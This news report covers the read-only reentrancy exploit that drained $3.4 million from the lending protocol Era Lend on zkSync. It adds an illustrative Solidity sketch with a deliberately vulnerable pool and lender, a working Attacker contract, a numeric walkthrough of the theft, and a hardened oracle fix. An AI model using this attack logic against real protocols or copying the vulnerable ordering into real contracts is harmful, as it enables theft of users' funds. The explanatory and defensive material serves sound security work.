Era Lend, a prominent decentralized lending protocol operating on the zkSync Layer 2 network, has fallen prey to a reentrancy attack, leading to a loss of $3.4 million. This unfortunate event was confirmed by BlockSec’s security analysts.
The attacker exploited a read-only reentrancy vulnerability. Rather than re-entering Era Lend to repeat a state-changing call, the attacker re-entered it in the middle of a SyncSwap pool operation, at a moment when the pool's LP token supply and its reserves were no longer consistent with each other, so that the view function Era Lend used to price LP-token collateral returned a distorted value. Borrowing against that value let the attacker withdraw more than the collateral was actually worth.
View functions are generally regarded as safe because they cannot change contract state, and for the same reason they are almost never guarded by reentrancy locks (the usual mutex is a storage write, which a view cannot perform). Many such functions compute a value from another contract's state, for example an LP token price derived from a third-party pool's reserves and total supply; the third party here was the decentralized exchange SyncSwap. This incident shows that a view function called while that other contract is mid-update can return an internally inconsistent figure, and that a protocol which trusts the figure can be drained of substantial funds.
Lei Wu, co-founder and CTO of BlockSec, explained to The Block, “The attacker altered the LP’s price during the burn/mint actions of SyncSwap, using its reserves to determine the LP price [on Era Lend]. All projects that utilize the SyncSwap code should remain alert.”
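The following Solidity sketch is an added example, not code from Era Lend, SyncSwap or BlockSec. The contracts HypotheticalPool, HypotheticalLender and Attacker, their function names, the 80% loan-to-value ratio, the exposed `locked` flag and the 1:1 ETH/TOKEN valuation are all assumptions made for illustration. It models the pattern the quote describes: a pool whose burn pays out before it refreshes the reserves an outside oracle reads, a lender whose oracle prices LP shares from those reserves and supply, and an attacker who borrows against the inflated mid-burn figure from inside the pool's payout callback. A hardened oracle variant refuses to price the LP token while the pool's reentrancy lock is held.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical ETH/TOKEN pool (an assumption for illustration, not SyncSwap's code); the TOKEN side is only an accounting balance.
contract HypotheticalPool {
    uint256 public reserveEth;
    uint256 public reserveToken;
    uint256 public totalSupply;                   // LP shares outstanding
    mapping(address => uint256) public lpBalance;
    mapping(address => mapping(address => uint256)) public allowance;
    bool public locked;                           // reentrancy lock, readable by outside oracles
    modifier lock() { require(!locked, "reentrant"); locked = true; _; locked = false; }

    // Deposit ETH; an equal TOKEN deposit is assumed and only recorded (1:1 valuation).
    function mint() external payable lock {
        uint256 shares = totalSupply == 0 ? msg.value : (msg.value * totalSupply) / reserveEth;
        lpBalance[msg.sender] += shares;
        totalSupply += shares;
        reserveEth += msg.value;
        reserveToken += msg.value;
    }
    // Vulnerable ordering: shares are burned and ETH is paid out before the reserve snapshot is
    // refreshed, so a view called from inside the payout sees a reduced supply backed by old reserves.
    function burn(uint256 shares) external lock {
        uint256 ethOut = (shares * reserveEth) / totalSupply;
        uint256 tokenOut = (shares * reserveToken) / totalSupply;
        lpBalance[msg.sender] -= shares;
        totalSupply -= shares;                                // (1) supply shrinks
        (bool ok, ) = msg.sender.call{value: ethOut}("");     // (2) control leaves the pool
        require(ok, "payout failed");
        reserveEth -= ethOut;                                 // (3) reserves updated last
        reserveToken -= tokenOut;
    }

    function approve(address spender, uint256 shares) external { allowance[msg.sender][spender] = shares; }
    function transferFrom(address from, address to, uint256 shares) external {
        allowance[from][msg.sender] -= shares;                // underflow reverts in 0.8
        lpBalance[from] -= shares;
        lpBalance[to] += shares;
    }
}

// Hypothetical lender that takes LP shares as collateral and prices them from pool reserves.
contract HypotheticalLender {
    HypotheticalPool public immutable pool;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    constructor(HypotheticalPool p) payable { pool = p; }    // deployed with lendable ETH

    // Vulnerable oracle: trusts whatever reserves and supply the pool reports right now.
    function lpPriceVulnerable() public view returns (uint256) {
        return ((pool.reserveEth() + pool.reserveToken()) * 1e18) / pool.totalSupply();
    }
    // Hardened oracle: refuse to price the LP token while the pool is mid-operation.
    function lpPriceSafe() public view returns (uint256) {
        require(!pool.locked(), "pool busy: possible read-only reentrancy");
        return lpPriceVulnerable();
    }
    function deposit(uint256 shares) external {
        pool.transferFrom(msg.sender, address(this), shares);
        collateral[msg.sender] += shares;
    }

    // Lends up to an assumed 80% of collateral value at the chosen oracle's price.
    function borrow(uint256 amount, bool hardened) external {
        uint256 price = hardened ? lpPriceSafe() : lpPriceVulnerable();
        uint256 value = (collateral[msg.sender] * price) / 1e18;
        require(debt[msg.sender] + amount <= (value * 80) / 100, "undercollateralised");
        debt[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Attacker: post some LP as collateral, burn the rest, and borrow against the inflated mid-burn price from the payout callback.
contract Attacker {
    HypotheticalPool immutable pool;
    HypotheticalLender immutable lender;
    bool useHardened;
    uint256 public priceSeenMidBurn;
    constructor(HypotheticalPool p, HypotheticalLender l) { pool = p; lender = l; }

    function attack(uint256 burnShares, bool hardened) external payable {
        useHardened = hardened;
        pool.mint{value: msg.value}();
        uint256 keep = pool.lpBalance(address(this)) - burnShares;
        pool.approve(address(lender), keep);
        lender.deposit(keep);
        pool.burn(burnShares);                                // receive() below runs mid-burn
    }
    receive() external payable {
        if (msg.sender == address(pool)) {                    // the pool's payout, lock still held
            priceSeenMidBurn = lender.lpPriceVulnerable();
            uint256 value = (lender.collateral(address(this)) * priceSeenMidBurn) / 1e18;
            lender.borrow((value * 80) / 100, useHardened);   // reverts with the hardened oracle
        }
    }
}
```

Minting with 10 ETH into an empty pool yields 10e18 shares; keeping 1e18 as collateral and burning 9e18, the callback sees a supply of 1e18 still backed by 20 ETH of reserves, a price of 20 ETH per share against a fair 2 ETH, and the attacker borrows 16 ETH against collateral worth 2 (the lender must be deployed with that much ETH). With `hardened = true`, lpPriceSafe() reverts inside the callback and the whole burn transaction unwinds. Checking the pool's lock is the cheapest fix and only works if the pool exposes it; a more robust design prices LP tokens from manipulation-resistant inputs rather than the pool's live reserves.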
In response to the attack, Era Lend issued a statement on Discord, “We have detected and confirmed a cyber attack on our platform. We want to assure you that the attack has been contained, and the threat actor can no longer continue their actions.” The team clarified that only the USDC pool was compromised, and the security of other assets remains intact.
As a safety measure, the team advised users to avoid depositing USDC for now. Furthermore, borrowing operations on the platform have been temporarily suspended.